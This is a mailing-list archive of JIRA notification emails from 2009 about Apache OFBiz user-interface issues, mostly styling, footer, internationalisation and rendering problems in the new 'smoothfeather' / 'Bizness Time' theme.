 Key: OFBIZ-2305
 URL: https://issues.apache.org/jira/browse/OFBIZ-2305
 Project: OFBiz
  Issue Type: Bug
  Components: order
Affects Versions: SVN trunk
Reporter: Jacopo Cappellato
Assignee: Tim Ruppert
 Fix For: Release Branch 9.04, SVN trunk


 Here is the link:
 https://localhost:8443/ordermgr/control/orderview?orderId=DEMO10090
 the PDF link is at the top left of the screen.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2316) Replace the footer in smoothfeater

2009-05-01 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12705140#action_12705140
 ] 

Jacques Le Roux commented on OFBIZ-2316:


In the new Bizness Time theme., I see these static informations without links

Powered by OFBiz Copyright 2001-2008 The Apache Software Foundation - 
www.apache.org

But I don't see some of the requirement above. Do I miss something ?

 Replace the footer in smoothfeater
 --

 Key: OFBIZ-2316
 URL: https://issues.apache.org/jira/browse/OFBIZ-2316
 Project: OFBiz
  Issue Type: Sub-task
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: screenshot-1.jpg


 ON dev ML, my request was
 Actually the things that IMO are missing are
 * The ASF copyright and link to a apache.org site
 * Powered by OFBiz and link to ofbiz.apache.org
 *  Release.revision informations
 Here is Ryan Foster's proposition
 The originally thinking was to give the backend look and feel a more 
 desktop like feeling, where most of the information and navigation is 
 located in sidebars, file menus, tabs, etc.  Following that line of thinking, 
 maybe we put a help link in the header right next to preferences that drops 
 down in a similar fashion to show copyright, link to apache, etc.  This would 
 function exactly the same way that the help link functions in apps like 
 Firefox, Mac Mail, Outlook, Word, etc.  We could even put a simple keyword 
 search field in this section that searches docs.ofbiz.org.  See the attached 
 screenshot for an example.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2306) The new smoothfeather style is not internationalized (i18n)

2009-05-01 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2306?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2306.
--

Resolution: Fixed
  Assignee: Tim Ruppert

Looks like this has been fixed in the new Buziness Time theme

 The new  smoothfeather style is not internationalized (i18n)
 --

 Key: OFBIZ-2306
 URL: https://issues.apache.org/jira/browse/OFBIZ-2306
 Project: OFBiz
  Issue Type: Bug
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
Assignee: Tim Ruppert
 Fix For: Release Branch 9.04, SVN trunk


 This is a *real handicap* for non English community. It should be done in the 
 Release 9.04 IMO

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2304) The css styles for smoothfeather style associated to the different log levels in the view log screen in webtools are missing

2009-05-01 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2304?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2304.
--

Resolution: Fixed
  Assignee: Tim Ruppert

Fixed in the new Buziness Time theme

 The css styles for smoothfeather style associated to the different log 
 levels in the view log screen in webtools are missing
 --

 Key: OFBIZ-2304
 URL: https://issues.apache.org/jira/browse/OFBIZ-2304
 Project: OFBiz
  Issue Type: Bug
  Components: framework
Affects Versions: SVN trunk
Reporter: Jacopo Cappellato
Assignee: Tim Ruppert
Priority: Minor
 Fix For: SVN trunk


 The css styles for smoothfeather style associated to the different log 
 levels in the view log screen in webtools are missing, and as a consequence, 
 the log messages are no longer colored as they are in the standard OFBiz 
 style; here is the screen:
 https://localhost:8443/webtools/control/LogView

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2312) Styling flaws in smoothfeather

2009-05-01 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2312?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12705147#action_12705147
 ] 

Jacques Le Roux commented on OFBIZ-2312:


Issue 1 in the new Buziness Time theme : login and pwd zones are still too long

 Styling flaws in smoothfeather
 --

 Key: OFBIZ-2312
 URL: https://issues.apache.org/jira/browse/OFBIZ-2312
 Project: OFBiz
  Issue Type: Sub-task
Affects Versions: SVN trunk
 Environment: XP FF3
Reporter: Jacques Le Roux
 Fix For: SVN trunk


 I was to create an issue for each styling flaws in smoothfeather, but it's 
 far too mcuh work. So I have created only one issue to list what we find.
 We can create a numbered comment for each issue to separate them and refer 
 easily to them whe fixed. Here we go
 I wondered how to close (sub-)issues here. I thought about removing 
 comments but editing the original comment and  using -understrike- with a 
 notice should be far better. You get  -understrike- using \-understrike\-
 If someone feels that the sub-issues here should be splitted in standard 
 sub-tasks of OFBIZ-2309 (or even better of the current issue), please feel 
 free to do so 

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Created: (OFBIZ-2413) The search servlet (up part of lookup screens) is any longer collapsable

2009-05-01 Thread Jacques Le Roux (JIRA)
The search servlet (up part of lookup screens) is any longer collapsable


 Key: OFBIZ-2413
 URL: https://issues.apache.org/jira/browse/OFBIZ-2413
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
Priority: Trivial
 Fix For: Release Branch 9.04, SVN trunk




-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2316) Replace the footer in smoothfeater

2009-05-01 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12705153#action_12705153
 ] 

Jacques Le Roux commented on OFBIZ-2316:


Actually the www.apache.org and OFBiz parts are links (I saw them when I read 
my comment in mail sent by Jira) but this are not visible as a link, maybe this 
is wanted, I'm not a designer ;) But I would try to keep them visible (links 
different from plain text) This is an all behaviour that I think we should 
keep. My 2 cts

 Replace the footer in smoothfeater
 --

 Key: OFBIZ-2316
 URL: https://issues.apache.org/jira/browse/OFBIZ-2316
 Project: OFBiz
  Issue Type: Sub-task
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: screenshot-1.jpg


 ON dev ML, my request was
 Actually the things that IMO are missing are
 * The ASF copyright and link to a apache.org site
 * Powered by OFBiz and link to ofbiz.apache.org
 *  Release.revision informations
 Here is Ryan Foster's proposition
 The originally thinking was to give the backend look and feel a more 
 desktop like feeling, where most of the information and navigation is 
 located in sidebars, file menus, tabs, etc.  Following that line of thinking, 
 maybe we put a help link in the header right next to preferences that drops 
 down in a similar fashion to show copyright, link to apache, etc.  This would 
 function exactly the same way that the help link functions in apps like 
 Firefox, Mac Mail, Outlook, Word, etc.  We could even put a simple keyword 
 search field in this section that searches docs.ofbiz.org.  See the attached 
 screenshot for an example.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2308) New smoothfeather style Business Area enhancement

2009-05-01 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2308?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12705137#action_12705137
 ] 

Jacques Le Roux commented on OFBIZ-2308:


The demand above as been solved in  the new Bizness Time theme which will 
replace smooth feather theme. Though without using different colors in both 
columns but in the columns title.

But I find another thing annoying : could it be possible to not have to use the 
up arrow but simply click around elsewhere. For instance if you open the 
Business Area and then (without closing the Business Area) the Preferences you 
dont see the Preferences options...

 New  smoothfeather style Business Area enhancement
 

 Key: OFBIZ-2308
 URL: https://issues.apache.org/jira/browse/OFBIZ-2308
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: SVN trunk
Reporter: Jacques Le Roux
 Fix For: SVN trunk


 We could have a title for each column of Business Area. Something like Main 
 applications Secondary applications, maybe 2 colors also ?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2339) No bullets rendered

2009-05-01 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2339?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12705125#action_12705125
 ] 

Jacques Le Roux commented on OFBIZ-2339:


Great, thanks Rob (and Tim)

 No bullets rendered
 ---

 Key: OFBIZ-2339
 URL: https://issues.apache.org/jira/browse/OFBIZ-2339
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux
Assignee: Tim Ruppert
 Fix For: SVN trunk


 The styles associate with
 *
 and
 **
 are no longer rendering bullets.
 Could it be possible to differentiate simple indentation from bullet 
 (numbering is working well) ?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



<    4   5   6   7   8   9   10   11   12   13   >